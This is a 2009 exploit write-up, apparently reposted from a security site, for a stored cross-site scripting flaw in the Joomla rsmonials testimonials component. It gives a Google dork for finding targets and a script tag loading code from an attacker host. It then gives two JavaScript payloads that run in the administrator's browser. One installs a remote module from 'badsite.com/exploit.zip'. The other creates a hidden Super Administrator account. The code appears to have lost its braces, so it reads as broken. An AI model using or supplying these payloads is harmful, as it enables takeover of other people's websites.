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Joomla Component rsmonials Remote Cross Site Scxripting Exploit
来源:www.vfcocus.net 作者:jdc 发布时间:2009-04-23  

RSMonials XSS Exploit


Google Dork: allinurl:option=com_rsmonials

Anything entered into the form gets rendered as HTML, so you can add tags
as long as they don't include quotes (magic quotes eats them, if it's on).
This component ships with settings that prevent posting by default, but
the administrator page for the testimonials renders your script in its entirety.

Proof of Concept 1: Remote file upload

Visit http://target.com/index.php?option=com_rsmonials and post a comment.
At the end of your glowing comment about how awesome the site is, attach this:

<script src=http://badsite.com/evil.js></script>

Now, when your admin goes to the com_rsmonials "Testimonials" page, your
script will execute. In this example, a hidden iframe loads up the install
page and installs a 'custom' module.


var exploited = false;
var iframe = document.createElement( 'iframe' );
var reg = new RegExp( 'administrator' );
if( reg.test( location.href ) )
 iframe.src = 'index.php?option=com_installer';
 iframe.setStyle( 'display', 'none' );
 document.body.appendChild( iframe );
 iframe.addEvent( 'load', exploit );
function exploit( e )
 if( exploited != true )
  var doc = e.target.contentDocument; if( !doc ) return;
  var inp = doc.getElementById( 'install_url' );
  inp.value = 'http://badsite.com/exploit.zip';
  var b = inp.parentNode.getElementsByTagName( 'input' )[1];
  exploited = true;


Proof of Concept 2: New Super Administrator

Here's a drop-in replacement for the 'exploit' function above:

function exploit( e )
 if( exploited != true )
  var newForm = false;
  var doc = e.target.contentDocument; if( !doc ) return;
  var nb = doc.getElementsByTagName( 'a' ); if( !nb ) return;
  var i = 0;
  for( ; i<nb.length; i++ )
   if( nb[i].parentNode.id == 'toolbar-new' )
   else if( nb[i].parentNode.id == 'toolbar-save' )
    doc.getElementById( 'name' ).value = 'hacked';
    doc.getElementById( 'username' ).value = 'hacked';
    doc.getElementById( 'email' ).value = 'your@freemail.com';
    doc.getElementById( 'password' ).value = 'password';
    doc.getElementById( 'password2' ).value = 'password';
    var g = doc.getElementById( 'gid' );
    g.selectedIndex = g.options.length - 1;
    exploited = true;

If the admin is a Super Admin, then you could be too... just remember to watch
your freemail account for Joomla's account notification!

/* jdc 2009 */

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